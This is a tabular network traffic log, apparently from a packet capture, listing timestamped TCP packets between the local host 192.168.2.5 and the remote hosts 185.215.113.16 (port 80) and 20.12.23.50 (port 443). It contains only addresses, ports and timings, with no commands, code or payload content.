Sep 1, 2024 06:28:11.542166948 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.542170048 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.542177916 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.542188883 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.542207956 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.542211056 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.542221069 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.542233944 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.542244911 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.542244911 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.542248964 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.542270899 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.542325974 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.548270941 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548300028 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548310995 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548374891 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.548374891 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.548377991 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548388958 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548398972 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548410892 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548439980 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.548506021 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.548531055 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548541069 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548552990 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548563004 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548573971 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548587084 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548599005 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.548667908 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.548860073 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548871994 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548882961 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548892975 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548903942 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.548928976 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.548939943 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.549441099 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.549452066 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.549463034 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.549472094 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.549504042 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.549504042 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.598385096 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.598463058 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.598566055 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.598577023 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.598690033 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.598701954 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.598711014 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.598716021 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.598737001 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.598745108 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.598788023 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.598828077 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.598858118 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.598876953 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.598889112 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.598900080 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.598961115 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.598961115 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.599139929 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599152088 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599163055 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599172115 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599246025 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.599287033 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599303961 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599315882 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599328995 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599329948 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.599379063 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.599379063 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.599594116 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599605083 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599620104 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599639893 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599656105 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.599662066 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.599688053 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.599713087 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.600147009 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.600158930 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.600168943 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.600179911 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.600191116 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.600203037 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.600214958 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.600225925 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.600238085 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.600238085 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.600239992 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.600259066 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.600272894 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.600284100 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.600316048 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.600732088 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.600744009 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.600805998 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.623456955 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:11.623478889 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:11.623486042 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:11.623505116 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:11.623539925 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:11.623550892 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:11.623569965 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:11.623583078 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:11.623594999 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:11.623614073 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:11.623814106 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:11.623864889 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:11.623871088 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:11.623979092 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:11.626602888 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:11.630350113 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630428076 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.630461931 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630471945 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630532980 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.630554914 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630567074 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630577087 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630587101 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630599976 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630606890 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.630634069 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.630634069 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.630801916 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630811930 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630821943 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630834103 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630846024 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630856991 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.630861044 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.630882978 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.630903959 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.631555080 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.631565094 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.631575108 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.631586075 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.631596088 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.631608963 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.631618977 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.631642103 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.631642103 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.631685972 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.631820917 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632000923 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632009029 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632018089 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632029057 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632040977 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632041931 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.632055044 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632069111 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632081985 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.632081985 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632081985 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.632095098 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632138968 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.632138968 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.632698059 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632708073 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632718086 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632729053 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632740021 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632749081 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632786989 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.632786989 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.632849932 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632869005 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632882118 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632893085 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632904053 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632915974 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632915974 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.632927895 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.632930994 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.632939100 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.632982016 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.633274078 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633284092 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633296013 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633306980 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633327007 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.633332968 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633343935 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633347034 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.633353949 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633366108 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633378029 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633389950 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.633389950 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.633392096 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633404016 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633418083 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633424997 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.633457899 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.633838892 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633851051 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.633902073 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.633902073 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.639000893 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639053106 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639064074 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639139891 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.639211893 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639223099 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639233112 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639242887 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639256001 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639271975 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.639271975 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.639286995 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.639550924 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639561892 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639571905 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639581919 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639594078 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639605045 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639628887 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.639628887 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.639650106 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.639947891 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639957905 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639967918 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639977932 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.639991045 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.640008926 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.640050888 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.661211014 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.661221981 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.661232948 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.661272049 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.661293983 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.661298990 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.661309958 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.661334038 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.661366940 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690224886 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690324068 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690398932 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690409899 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690465927 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690474987 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690486908 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690498114 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690505028 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690505028 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690514088 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690529108 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690583944 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690740108 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690751076 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690762997 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690807104 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690807104 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690813065 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690829992 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690845013 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690855980 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690864086 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690864086 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690877914 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690898895 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690922022 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690932989 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690943956 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690956116 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690973043 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690977097 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.690984011 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690996885 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.690999031 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.691023111 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.691031933 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.691090107 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691102982 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691113949 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691124916 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691135883 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691150904 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.691207886 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.691450119 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691461086 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691481113 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691490889 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691504955 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691515923 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.691515923 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.691519022 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691530943 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.691566944 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.691709042 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691720963 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691730976 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691741943 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.691773891 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.691796064 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.720829010 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.720875025 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.720884085 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.720906019 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.720921993 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.720949888 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.720977068 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.720988035 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.720999002 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721030951 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.721045971 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.721167088 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721213102 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721302032 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.721406937 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721416950 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721434116 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721447945 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721458912 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.721458912 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721487045 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.721508980 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.721575022 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721585989 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721596003 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721641064 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.721641064 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.721714020 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721724987 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721735001 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721791029 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.721791029 CEST	49711	80	192.168.2.5	185.215.113.16
